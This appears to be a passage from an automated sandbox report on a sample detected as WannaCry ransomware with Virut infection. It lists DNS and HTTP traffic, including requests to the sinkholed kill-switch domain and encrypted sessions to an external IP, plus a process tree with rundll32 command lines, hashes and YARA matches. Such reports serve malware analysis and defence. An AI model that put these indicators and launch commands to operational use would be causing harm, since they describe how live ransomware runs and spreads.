Jan 15, 2025 16:59:12.099358082 CET	1.1.1.1	192.168.2.8	0x297c	Name error (3)	iyqdfh.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:12.110275984 CET	1.1.1.1	192.168.2.8	0xc84b	Name error (3)	chmtuj.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:12.120338917 CET	1.1.1.1	192.168.2.8	0xbba	Name error (3)	scbors.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:12.276958942 CET	1.1.1.1	192.168.2.8	0x40d4	Name error (3)	dkyyvp.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:12.287694931 CET	1.1.1.1	192.168.2.8	0x5696	Name error (3)	orvwjv.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	104.16.166.228	80	5568	C:\Windows\mssecsvc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 16:57:15.602371931 CET	100	OUT	GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache
Jan 15, 2025 16:57:16.079792023 CET	778	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:57:16 GMT Content-Type: text/html Content-Length: 607 Connection: close Server: cloudflare CF-RAY: 90270f7f185d0f97-EWR Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.8	49707	88.198.69.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 16:57:25.580888987 CET	20	OUT	Data Raw: 6e 28 76 8d a8 79 fc bd a0 49 34 cb 65 49 e9 81 cc 12 7d 74 Data Ascii: n(vyI4eI}t
Jan 15, 2025 16:57:25.585820913 CET	26	OUT	Data Raw: d6 a8 bc 6a 01 72 db b1 94 9c c7 a6 c2 cf 4c a6 15 79 0b 31 ff 88 06 59 63 f3 Data Ascii: jrLy1Yc

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.8	49708	88.198.69.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 16:57:25.663785934 CET	20	OUT	Data Raw: 2e c0 72 05 4d db 85 ff e5 1c 3b 9c c0 9d 9b f9 7e 7b 53 a6 Data Ascii: .rM;~{S
Jan 15, 2025 16:57:25.668581009 CET	26	OUT	Data Raw: 6b 0a c8 3c 92 04 67 27 54 91 67 1a c1 54 67 7d aa c4 40 67 9d b0 8e 71 96 07 Data Ascii: k<g'TgTg}@gq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49710	104.16.167.228	80	1196	C:\Windows\mssecsvc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 16:57:28.726372004 CET	100	OUT	GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache
Jan 15, 2025 16:57:29.208458900 CET	778	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:57:29 GMT Content-Type: text/html Content-Length: 607 Connection: close Server: cloudflare CF-RAY: 90270fd10f070cb2-EWR Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49711	104.16.167.228	80	4432	C:\Windows\mssecsvc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 16:57:28.794615030 CET	100	OUT	GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache
Jan 15, 2025 16:57:29.292155027 CET	778	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:57:29 GMT Content-Type: text/html Content-Length: 607 Connection: close Server: cloudflare CF-RAY: 90270fd19ef47cfc-EWR Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.8	50071	88.198.69.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 16:58:17.033660889 CET	20	OUT	Data Raw: 90 e5 1c fd 95 7f 56 12 c8 27 89 b6 33 f3 ff 1b ab c4 82 92 Data Ascii: V'3
Jan 15, 2025 16:58:17.038501024 CET	26	OUT	Data Raw: b6 91 6a 42 ee c3 b1 78 30 d0 cd 1f f2 8f 37 38 a5 36 d1 a5 9c d1 1a b8 55 4f Data Ascii: jBx0786UO

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.8	50073	88.198.69.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 16:58:17.098099947 CET	20	OUT	Data Raw: 22 e5 38 e3 79 a4 df 5e 70 f2 2d 7e 79 83 b2 9e 1f d3 3b 8d Data Ascii: "8y^p-~y;
Jan 15, 2025 16:58:17.103259087 CET	26	OUT	Data Raw: 9b 56 1e 51 c0 44 4b e0 91 1c 1f 7f 04 40 c1 84 3d 9d f6 fc 8b fc 4d a6 36 77 Data Ascii: VQDK@=M6w

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.8	61898	88.198.69.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 16:59:08.426640987 CET	20	OUT	Data Raw: 6c 32 cf f2 93 21 f5 1c 00 dd ec 88 e7 8c 9b 79 b0 98 a0 24 Data Ascii: l2!y$
Jan 15, 2025 16:59:08.432790041 CET	26	OUT	Data Raw: e7 c9 97 87 13 71 e1 6a b0 2e bd 59 7d 68 96 f0 3e c1 5b 46 fa a3 a8 0b 89 37 Data Ascii: qj.Y}h>[F7

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.8	61900	88.198.69.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 16:59:08.485380888 CET	20	OUT	Data Raw: 5b 73 1f 81 72 37 3a fe 27 22 0b 8c f2 a4 a7 47 d5 11 71 b5 Data Ascii: [sr7:'"Gq
Jan 15, 2025 16:59:08.490201950 CET	26	OUT	Data Raw: 20 a8 8a 48 22 85 6c a2 cf a6 66 a4 f7 52 e1 4e c4 0c 88 5f 7f fc 8b f9 88 3a Data Ascii: H"lfRN_:

Target ID:	0
Start time:	10:57:10
Start date:	15/01/2025
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll"
Imagebase:	0xa30000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:57:10
Start date:	15/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:57:11
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",#1
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:57:11
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\GeW4GzT8G8.dll,PlayGame
Imagebase:	0x950000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:57:11
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",#1
Imagebase:	0x950000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:57:11
Start date:	15/01/2025
Path:	C:\Windows\mssecsvc.exe
Wow64 process (32bit):	true
Commandline:	C:\WINDOWS\mssecsvc.exe
Imagebase:	0x400000
File size:	3'751'936 bytes
MD5 hash:	80F63BEA8710636ED2F30EAD25E07C82
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000006.00000002.1710675304.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000006.00000002.1712970939.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.1467969506.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000002.1709919485.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.1468096628.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.1468096628.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000002.1710114381.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000002.1710114381.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly) Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT) Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:57:11
Start date:	15/01/2025
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff6cc5a0000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.1469139921.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000002.2718684916.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000002.2719199540.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:57:11
Start date:	15/01/2025
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff6b5fa0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000000.1472570641.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000002.2719360325.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000002.2718814793.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:57:13
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.2718957847.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.2719525179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000000.1483800032.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	10:57:13
Start date:	15/01/2025
Path:	C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	"fontdrvhost.exe"
Imagebase:	0x7ff69ba10000
File size:	827'408 bytes
MD5 hash:	BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000002.2777494237.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000002.2719121091.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000000.1492508014.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	10:57:14
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",PlayGame
Imagebase:	0x950000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:57:14
Start date:	15/01/2025
Path:	C:\Windows\mssecsvc.exe
Wow64 process (32bit):	true
Commandline:	C:\WINDOWS\mssecsvc.exe
Imagebase:	0x400000
File size:	3'751'936 bytes
MD5 hash:	80F63BEA8710636ED2F30EAD25E07C82
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000C.00000002.1693222311.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000C.00000000.1495917347.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000C.00000002.1693473204.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000C.00000002.1693473204.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000C.00000000.1496071117.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000C.00000000.1496071117.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:57:14
Start date:	15/01/2025
Path:	C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	"fontdrvhost.exe"
Imagebase:	0x7ff69ba10000
File size:	827'408 bytes
MD5 hash:	BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.2777847193.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.1495914379.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.2719250523.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	10:57:14
Start date:	15/01/2025
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Imagebase:	0x7ff673080000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.1868184392.000000007FFF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:57:14
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k RPCSS -p
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.1497422002.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.2718214298.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.2777494761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	10:57:15
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000000.1504207342.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000002.2720025241.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000002.2719387016.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	10:57:15
Start date:	15/01/2025
Path:	C:\Windows\mssecsvc.exe
Wow64 process (32bit):	true
Commandline:	C:\WINDOWS\mssecsvc.exe -m security
Imagebase:	0x400000
File size:	3'751'936 bytes
MD5 hash:	80F63BEA8710636ED2F30EAD25E07C82
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.2280238468.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000011.00000002.2281703950.0000000002501000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000011.00000002.2281703950.0000000002501000.00000004.00000020.00020000.00000000.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000011.00000000.1507512930.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000011.00000000.1507512930.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000011.00000002.2279802499.000000000042E000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000011.00000002.2281362930.0000000001FD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000011.00000002.2281362930.0000000001FD6000.00000004.00000020.00020000.00000000.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000011.00000000.1507342095.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000011.00000002.2279994193.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: Joe Security 